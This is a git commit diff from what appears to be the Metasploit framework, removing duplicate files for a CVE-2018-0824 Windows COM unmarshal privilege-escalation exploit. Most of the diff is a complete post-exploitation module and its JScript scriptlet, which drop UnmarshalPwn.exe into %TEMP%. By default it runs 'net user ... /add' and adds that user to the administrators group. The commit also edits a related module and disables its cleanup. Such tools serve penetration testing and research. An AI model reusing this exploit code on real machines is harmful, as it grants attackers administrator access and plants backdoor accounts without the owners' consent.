Remove duplicated files

2024-07-18 18:31:41 +02:00 · 2018-10-23 12:31:18 -05:00 · 2018-10-23 12:31:18 -05:00 · 927a29530b
commit 927a29530b
parent 47353553e5
5 changed files with 5 additions and 339 deletions
--- a/data/exploits/CVE-2018-0824/poc_footer
+++ b/data/exploits/CVE-2018-0824/poc_footer
@ -1,5 +0,0 @@
-");
-]]>
-</script>
-</component>
-</package>
--- a/data/exploits/CVE-2018-0824/poc_header
+++ b/data/exploits/CVE-2018-0824/poc_header
@ -1,13 +0,0 @@
-<?xml version='1.0'?>
-<package>
-<component id='giffile'>
-<registration
-	description='Dummy'
-	progid='giffile'
-	version='1.00'
-	remotable='True'>
-</registration>
-<script language='JScript'>
-<![CDATA[
-	var oShell = new ActiveXObject('Wscript.Shell');
-	oShell.Run("cmd.exe 
--- a/modules/exploits/windows/local/unmarshal.rb
+++ b/modules/exploits/windows/local/unmarshal.rb
--- a/modules/post/windows/escalate/unmarshal.rb
+++ b/modules/post/windows/escalate/unmarshal.rb
@ -1,134 +0,0 @@
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Post
-
-  include Msf::Post::File
-  include Msf::Post::Windows::Registry
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Windows unmarshal post exploitation',
-      'Description' => %q{
-        This module exploits a local privilege escalation bug which exists
-        in microsoft COM for windows when it fails to properly handle serialized objects.},
-      'References'  =>
-        [
-          ['CVE', '2018-0824'],
-          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824'],
-          ['URL', 'https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn'],
-          ['EDB', '44906']
-        ],
-      'Author'      =>
-        [
-          'Nicolas Joly', # Vulnerability discovery
-          'Matthias Kaiser', # Exploit PoC
-          'Sanjay Gondaliya', # Modified PoC
-          'Pratik Shah <pratik@notsosecure.com>' # Metasploit module
-        ],
-      'DisclosureDate' => 'Aug 05 2018',
-      'Arch'           => [ARCH_X64],
-      'SessionTypes'   => ['meterpreter'],
-      'License'        => MSF_LICENSE
-    ))
-
-    register_options(
-      [
-         OptString.new('POCCMD', [true, 'The command to run from poc.sct', '/k net user msfadmin P@ssw0rd /add && net localgroup administrators msfadmin /add']),
-         OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ])
-      ])
-  end
-
-    def write_poc_to_target(rpoc, rpocname)
-      begin
-        print_warning("writing to %TEMP%")
-        temppoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
-        write_sct_to_target(temppoc,rpoc)
-      end
-
-    print_good("Persistent Script written to #{temppoc}")
-    temppoc
-   end
-
-    def write_sct_to_target(temppoc,rpoc)
-     fd = session.fs.file.new(temppoc, "w")
-     fd.write(rpoc)
-     fd.close
-  end
-
-    def app_poc_on_target(append,rpocname)
-     appendpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
-     fd = session.fs.file.new(appendpoc, "a")
-     fd.write(append)
-     fd.close
-   end
-
-    def create_sct_file(txt)
-     print_status("Reading Payload from file #{txt}")
-     ::IO.read(txt)
-   end
-
-    def write_exe_to_target(rexe, rexename)
-     begin
-       print_warning("writing to %TEMP%")
-       temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
-       write_file_to_target(temprexe,rexe)
-     end
-    print_good("Persistent Script written to #{temprexe}")
-    temprexe
-   end
-
-     def write_file_to_target(temprexe,rexe)
-      fd = session.fs.file.new(temprexe, "wb")
-      fd.write(rexe)
-      fd.close
-   end
-
-     def create_payload_from_file(exec)
-      print_status("Reading Payload from file #{exec}")
-      ::IO.read(exec)
-   end
-
-     def run
-      rexename =  Rex::Text.rand_text_alphanumeric(10) + ".exe"
-      print_status("exe name is: #{rexename}")
-      rpocname =  Rex::Text.rand_text_alphanumeric(10) + ".sct"
-      print_status("poc name is: #{rpocname}")
-      poccmd =  datastore['POCCMD']
-      cmdcheck = datastore['CMDCHECK']
-
-      rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
-      raw = create_payload_from_file rexe
-      script_on_target = write_exe_to_target(raw, rexename)
-      rpoc = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_header')
-      rawsct = create_sct_file rpoc
-      poc_on_target = write_poc_to_target(rawsct, rpocname)
-
-      cmdpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
-      fd = session.fs.file.new(cmdpoc, "a")
-      fd.write(poccmd)
-      fd.close
-
-      rpoc1 = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_footer')
-      append = create_payload_from_file rpoc1
-      append_on_target = app_poc_on_target(append, rpocname)
-
-      print_status('Starting module...')
-      print_line('')
-
-      command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
-      print_status("Location of UnmarshalPwn.exe is: #{command}")
-      command1 = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
-      print_status("Location of poc.sct is: #{command1}")
-
-      command += " "
-      command += "#{command1}"
-
-      print_status("Executing command : #{command}")
-      command_output = cmd_exec(command)
-      print_line(command_output)
-      print_line('')
-
-  end
-end
--- a/modules/post/windows/escalate/unmarshal_cmd_exec.rb
+++ b/modules/post/windows/escalate/unmarshal_cmd_exec.rb
@ -73,7 +73,9 @@ class MetasploitModule < Msf::Exploit::Local
    password = Rex::Text.rand_text_alpha((rand(8) + 6))
    print_status("username = #{username}, password = #{password}")
    cmd_to_run = 'net user /add ' + username + ' ' + password
+    cmd_to_run += '  > C:\\\\Windows\\\\Temp\\\\testoutput.txt'
    cmd_to_run += '  & net localgroup administrators /add ' + username
+    cmd_to_run += '  >> C:\\\\Windows\\\\Temp\\\\testoutput.txt'
    print_status(cmd_to_run)
    return cmd_to_run
  end
@ -127,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Local
    script_template_data = ::IO.read(local_script_template_path)
    vprint_status("script_template_data.length =  #{script_template_data.length}")
    full_command = 'cmd.exe /c ' + cmd_to_run
+    full_command = cmd_to_run
    script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
    if script_data == nil
      fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
@ -158,13 +161,13 @@ class MetasploitModule < Msf::Exploit::Local
      vprint_status(command_output)
      print_good('Exploit completed, wait for elevated session')
      ensure_clean_destination(exploit_path)
-      ensure_clean_destination(script_path)
+#      ensure_clean_destination(script_path)
    rescue Rex::Post::Meterpreter::RequestError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      print_good('Command failed, cleaning up')
      print_error(e.message)
      ensure_clean_destination(exploit_path)
-      ensure_clean_destination(script_path)
+#      ensure_clean_destination(script_path)
    end
  end